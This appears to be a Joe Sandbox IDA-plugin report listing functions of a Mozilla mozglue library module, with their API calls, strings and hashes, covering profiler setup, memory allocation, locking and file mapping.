Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 0ebaa49e117085aaba6e00dc9abee4cce8fb1cb40647ec23626fc0ca578d67b8
Instruction ID: 048691e56d815c5ce5ff9934b1653f4d68fbf144fe884cfb039a47e4f97e4575
Opcode Fuzzy Hash: 0ebaa49e117085aaba6e00dc9abee4cce8fb1cb40647ec23626fc0ca578d67b8
Instruction Fuzzy Hash: 2E516FB1604705EFD704DF25C484A9ABBF8FF8A358F00862DE95A87B51EB30E945CB91

Function 6CCDEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDEC8C

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDECA1
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CCDECC5
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CCDED19
CloseHandle.KERNEL32(?), ref: 6CCDED28
free.MOZGLUE(00000000), ref: 6CCDED2F
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CCDEC94

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6b6b61ae065b1ff40fd1f32c79b6e09eb7acece0087670b59f097c733bc9b087
Instruction ID: e3495435efbd9a7b42c480d0e461ac70a683d42d726bb1c2b74716c0000b268a
Opcode Fuzzy Hash: 6b6b61ae065b1ff40fd1f32c79b6e09eb7acece0087670b59f097c733bc9b087
Instruction Fuzzy Hash: 0121D6B5600104AFFB009F65D805B9A7B7DEB4626CF114218FF1897F81EB31E806CBA1

Function 6CCD8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6CC9EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CCDB392,?,?,00000001), ref: 6CCD91F4

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

Strings

timeline-memory, xrefs: 6CCD9088
stack-chart, xrefs: 6CCD90B2
data, xrefs: 6CCD90E8
timeline-fileio, xrefs: 6CCD90A4
marker-chart, xrefs: 6CCD905E
marker-table, xrefs: 6CCD906C
timeline-overview, xrefs: 6CCD907A
timeline-ipc, xrefs: 6CCD9096
name, xrefs: 6CCD8F16

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: e8c657b2a37ea4dbb1ae9a8ab32be748ffdf52021e2baff5e5dcd037ffbfb93f
Instruction ID: 4669cdbaf1d22cd96f97686f0bf31550cae2f9df5d12a6dbb387def49d58af6a
Opcode Fuzzy Hash: e8c657b2a37ea4dbb1ae9a8ab32be748ffdf52021e2baff5e5dcd037ffbfb93f
Instruction Fuzzy Hash: F0B108B0B012099BDB04DF99D4A57EEBBB5BF85318F104019D606ABF90EB31A945CBD1

Function 6CCBC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCBC5A3
WideCharToMultiByte.KERNEL32 ref: 6CCBC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CCBC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CCBCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCBCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCBCAA5

Strings

(null), xrefs: 6CCBC596
0, xrefs: 6CCBD30A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 4a62d49b39b81aa02fc789082a90675fd32d7d8ec82edfe044728750c8aa80a8
Instruction ID: 3acefb1978f7752c554f30d648ea778f20a2d9279a050b22036aed198abfb54c
Opcode Fuzzy Hash: 4a62d49b39b81aa02fc789082a90675fd32d7d8ec82edfe044728750c8aa80a8
Instruction Fuzzy Hash: C6A1BC316083429FEB00DF69C554B5ABBF5BF89348F04882DE999E7642E735E805CB92

Function 6CC93480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC93492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC934A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC934EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC9350E
__Init_thread_footer.LIBCMT ref: 6CC93522
__aulldiv.LIBCMT ref: 6CC93552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC9357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC93592

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

Strings

kernel32.dll, xrefs: 6CC934EA
GetSystemTimePreciseAsFileTime, xrefs: 6CC93508

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 52f05a515c563da9c824f230c04f510b7f0ab04e76c07a48b85f7f2668ec15ae
Instruction ID: 9acd01ce55ac35819dac389253a7b6468ad54c18e1a5ac28c434b1eb3aff6b92
Opcode Fuzzy Hash: 52f05a515c563da9c824f230c04f510b7f0ab04e76c07a48b85f7f2668ec15ae
Instruction Fuzzy Hash: DD319571B00105ABEF04EFB5D859AAA77BEFB49304F144019E605D3FA0EB74D906CB61

Function 6CC94480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CCD4843,?), ref: 6CC945F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CCD4843,?), ref: 6CC9468A
free.MOZGLUE(?,?,?,?,?,?,6CCD4843,?), ref: 6CC946C9
free.MOZGLUE(?), ref: 6CC946EF
free.MOZGLUE(?), ref: 6CC94712
free.MOZGLUE(?), ref: 6CC94735
free.MOZGLUE(?), ref: 6CC94758
free.MOZGLUE(?), ref: 6CC9477B
free.MOZGLUE(?), ref: 6CC9479E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: e6f80174744df70ad7de2494a0252794e16b5bf1e441b2afb2f51fb95be22744
Instruction ID: ce9f1108b66c48b6fd5e3cfecacaecc37796b7441a12c302f71d30f7329fbc96
Opcode Fuzzy Hash: e6f80174744df70ad7de2494a0252794e16b5bf1e441b2afb2f51fb95be22744
Instruction Fuzzy Hash: C9B1E2B2A005508FDB18DF7CD89476D77A2AF46328F184669E426DFB96F731D840CB81

Function 6CCFAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CCFAC52
CreateFileMappingW.KERNEL32 ref: 6CCFAC7D
GetSystemInfo.KERNEL32 ref: 6CCFAC98
MapViewOfFile.KERNEL32 ref: 6CCFACB0
GetSystemInfo.KERNEL32 ref: 6CCFACCD
MapViewOfFile.KERNEL32 ref: 6CCFAD05
UnmapViewOfFile.KERNEL32 ref: 6CCFAD1C
CloseHandle.KERNEL32 ref: 6CCFAD28
UnmapViewOfFile.KERNEL32 ref: 6CCFAD37
CloseHandle.KERNEL32 ref: 6CCFAD43
CloseHandle.KERNEL32 ref: 6CCFAD67

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 15f4abe3e1175b268b607489b5d45f994ec9a54579603c9c705cea0e2cb0e529
Instruction ID: 4faa358df2daf03f7018880a7a9a3d8807362ce5b9b4e7b59a2e998e4d093d12
Opcode Fuzzy Hash: 15f4abe3e1175b268b607489b5d45f994ec9a54579603c9c705cea0e2cb0e529
Instruction Fuzzy Hash: D4318FB1A047049FEB00AFBCD64926EBBF4BF85304F01492DEA9587751EB70D449CB92

Function 6CC91E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC91EC1
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91EE1
EnterCriticalSection.KERNEL32(6CD1E744), ref: 6CC91F38
LeaveCriticalSection.KERNEL32(6CD1E744), ref: 6CC91F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC91F83
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FC0
EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FE2
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC92019

Strings

MOZ_CRASH(), xrefs: 6CC92000

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 1a1604745603f69a1eda75a3be3004d0aeb56432cf4db74ae0baf5e2a03f549f
Instruction ID: 06f7a56e9294917b34e46027671c49fd55fdb1081ced6f2a68536f2a5981cbb3
Opcode Fuzzy Hash: 1a1604745603f69a1eda75a3be3004d0aeb56432cf4db74ae0baf5e2a03f549f
Instruction Fuzzy Hash: 4241C6B1B043199BFF009FACC88AB6A7AB9EB49344F040129EA1597F41E771D805CBD1

Function 6CCA7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCA7EA7
malloc.MOZGLUE(00000001), ref: 6CCA7EB3

Part of subcall function 6CCACAB0: EnterCriticalSection.KERNEL32(?), ref: 6CCACB49
Part of subcall function 6CCACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CCACBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CCA7EC4
mozalloc_abort.MOZGLUE(?), ref: 6CCA7F19
malloc.MOZGLUE(?), ref: 6CCA7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CCA7F4D

Strings

d, xrefs: 6CCA7F89

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 2820ce26385f0e29a3fb04660e1a475dd962c17fc6942e6c9427caecaa77a293
Instruction ID: e9906381ab56e96717e8db72355cc5e5b7d4aca96b17f05775415f97b9f512ac
Opcode Fuzzy Hash: 2820ce26385f0e29a3fb04660e1a475dd962c17fc6942e6c9427caecaa77a293
Instruction Fuzzy Hash: 1431C461E006499BEB009F788C095BEB778EF95208F059229DD4957A12FB31AA89C391

Function 6CCA3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4157

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 4d7f18fe2d2b05adf463f08cc0c299bfac6ada6fa6a499404717d5d640c93345
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 3AA182B1A00206CFDB40CFA9C884659B7B5FF48304F294199D9099F752E771E847CFA1

Function 6CCE9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCE8273), ref: 6CCE9D65
free.MOZGLUE(6CCE8273,?), ref: 6CCE9D7C
free.MOZGLUE(?,?), ref: 6CCE9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CCE9E0F
free.MOZGLUE(6CCE946B,?,?), ref: 6CCE9E24
free.MOZGLUE(?,?,?), ref: 6CCE9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CCE9EC8
free.MOZGLUE(6CCE946B,?,?,?), ref: 6CCE9EDF
free.MOZGLUE(?,?,?,?), ref: 6CCE9EF5

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 2f37d7222f4ac68b315ad038e941659c333bd64f9dacff0a9aecb2370df6b1e5
Instruction ID: cd8a9310cfdc001f845ff43d5e0a0ac2494658aac40d281f24230135bfe5a28e
Opcode Fuzzy Hash: 2f37d7222f4ac68b315ad038e941659c333bd64f9dacff0a9aecb2370df6b1e5
Instruction Fuzzy Hash: 5671B0B0909B819BC712CF58C48059BF3F5FF9A314B448659E95A6BB01FB30F985CB81

Function 6CCEDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CCEDDCF

Part of subcall function 6CCCFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCFA4B

Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE90FF
Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDE0D
free.MOZGLUE(00000000), ref: 6CCEDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCDDEFD,?,6CCA4A68), ref: 6CCEDF32

Part of subcall function 6CCEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCEDB86
Part of subcall function 6CCEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCEDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCDDEFD,?,6CCA4A68), ref: 6CCEDF65
free.MOZGLUE(?), ref: 6CCEDF80

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: fb4a820b82563c0df68ba8eac0c822c17bbdc63cbc0b653fe206e8b338551d8c
Instruction ID: f1c492eacdc6b69b0f8bc343743060125c20f9e2ec9d6033dd6d9998b43b7f93
Opcode Fuzzy Hash: fb4a820b82563c0df68ba8eac0c822c17bbdc63cbc0b653fe206e8b338551d8c
Instruction Fuzzy Hash: CB51C4726016019BD711CB28C8846AEB376BFDB308F95012CD91A63B00FB31F95ACB92

Function 6CCF5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5DC9
std::_Facet_Register.LIBCPMT ref: 6CCF5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5E45

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 80957c5581420f0246283b657d4a0a4185fd008db73797acf65f091749236234
Instruction ID: 5a591ac7d2952b61a009d75efafeb81d44413502a141d578fcbe4619840946cd
Opcode Fuzzy Hash: 80957c5581420f0246283b657d4a0a4185fd008db73797acf65f091749236234
Instruction Fuzzy Hash: D441B270B003049FEB04DFA5C999AAE77B9EF89314F148068D71697B91EB34E806CB61

Function 6CCCCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC931A7), ref: 6CCCCDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CCCCFA4, 6CCCCFB8
